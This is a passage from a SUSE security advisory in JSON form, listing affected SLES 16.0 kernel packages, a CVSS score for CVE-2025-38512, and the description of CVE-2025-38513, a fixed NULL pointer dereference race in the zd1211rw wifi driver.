"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-38512"
},
{
"cve": "CVE-2025-38513",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38513"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: zd1211rw: Fix potential NULL pointer dereference in zd_mac_tx_to_dev()\n\nThere is a potential NULL pointer dereference in zd_mac_tx_to_dev(). For\nexample, the following is possible:\n\n \tT0\t\t\t \t\tT1\nzd_mac_tx_to_dev()\n /* len == skb_queue_len(q) */\n while (len \u003e ZD_MAC_MAX_ACK_WAITERS) {\n\n\t\t\t\t\t filter_ack()\n\t\t\t\t\t spin_lock_irqsave(\u0026q-\u003elock, flags);\n\t\t\t\t\t /* position == skb_queue_len(q) */\n\t\t\t\t\t for (i=1; i\u003cposition; i++)\n\t\t\t\t \t skb = __skb_dequeue(q)\n\n\t\t\t\t\t if (mac-\u003etype == NL80211_IFTYPE_AP)\n\t\t\t\t\t skb = __skb_dequeue(q);\n\t\t\t\t\t spin_unlock_irqrestore(\u0026q-\u003elock, flags);\n\n skb_dequeue() -\u003e NULL\n\nSince there is a small gap between checking skb queue length and skb being\nunconditionally dequeued in zd_mac_tx_to_dev(), skb_dequeue() can return NULL.\nThen the pointer is passed to zd_mac_tx_status() where it is dereferenced.\n\nIn order to avoid potential NULL pointer dereference due to situations like\nabove, check if skb is not NULL before passing it to zd_mac_tx_status().\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
